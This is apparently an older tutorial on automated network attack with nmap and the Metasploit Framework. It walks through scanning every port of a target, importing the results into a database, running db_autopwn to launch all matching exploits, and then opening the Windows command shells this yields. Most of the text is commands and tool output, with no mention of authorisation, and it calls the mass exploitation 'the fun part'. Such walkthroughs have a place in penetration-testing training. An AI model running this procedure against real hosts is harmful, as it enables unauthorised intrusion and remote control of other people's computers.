Prerequisites
1) Install nmap . www.insecure.org
2) Install MySQL . www.mysql.org
a. Note . you can use other databases, such as SQLite or Postgres if desired.
3) Install the Metasploit Framework . www.metasploit.com
4) Update the Metasploit Framework
a. Use the .Online Update. shortcut, or;
b. In the msf3 directory (%appdata%\msf3), run the command: .svn update..
Attacking a host
1) Use nmap to scan a target, and output the results as XML for Metasploit
a. TCP: nmap -sV -p0-65535 host -oX host-tcp.xml
b. UDP: nmap .sU -sV -p0-65535 host -oX host-udp.xml
c. Note: You can use the Metasploit function db_nmap to directly import the results, but I prefer to keep an external copy on disk.
2) Start Metasploit
a. Load the database support:
msf > load db_mysql
[*] Successfully loaded plugin: db_mysql
b. Connect to the MySQL database:
msf > db_create
<mysql-user>:<password>@localhost:<port>/<hostname>
[*] Database creation complete (check for errors)
c. Copy the nmap results into the Metasploit home directory:
copy host-tcp.xml %appdata%\msf3
copy host-udp.xml %appdata%\msf3
d. Import the nmap results into the database:
msf > db_import_nmap_xml host-tcp.xml
msf > db_import_nmap_xml host-udp.xml
e. Verify that the nmap import was successful:
msf > db_services
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=80 proto=tcp state=up name=http
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=135 proto=tcp state=up name=msrpc
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=139 proto=tcp state=up name=netbios-ssn
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=445 proto=tcp state=up name=microsoft-ds
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=1051 proto=tcp state=up name=msrpc
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=1320 proto=tcp state=up name=msrpc
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=1433 proto=tcp state=up name=ms-sql-s
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=2301 proto=tcp state=up name=http
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=2381 proto=tcp state=up name=http
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=2853 proto=tcp state=up name=msrpc
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=3389 proto=tcp state=up name=microsoft-rdp
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=8080 proto=tcp state=up name=http
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=9090 proto=tcp state=up name=http
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=20001 proto=tcp state=up name=http
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=56737 proto=tcp state=up name=http
[*] Time: Tue Jun 03 11:09:56 +1000 2008] Service: host=127.1.2.3 port=56738 proto=tcp state=up name=ssl
f. Now the fun part . let Metasploit throw everything it has at the target!
msf > db_autopwn -t -p .e
[*] Analysis completed in 11.8630001544952 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 127.1.2.3:135...
[*] Matched exploit/unix/webapp/php_xmlrpc_eval against 127.1.2.3:80...
[*] Launching exploit/unix/webapp/php_xmlrpc_eval (2/82) against 127.1.2.3:80...
[*] Started bind handler
[*] Matched exploit/windows/http/navicopa_get_overflow against 127.1.2.3:80...
[*] Launching exploit/windows/http/navicopa_get_overflow (3/82) against 127.1.2.3:80...
.
g. Wait for autopwn to complete, then check for any sessions:
msf> sessions .l .v
Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 127.1.2.3:4444 -> 127.1.2.3:50671 windows/http/savant_31_overflow
h. With any luck you will have multiple shells. Interact with each by specifying the session number:
msf> sessions .i 1
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Windows\system32>
i. You can pause a session (Ctrl+Z) to come back to it later, or close the session (Ctrl+C) on the server.
|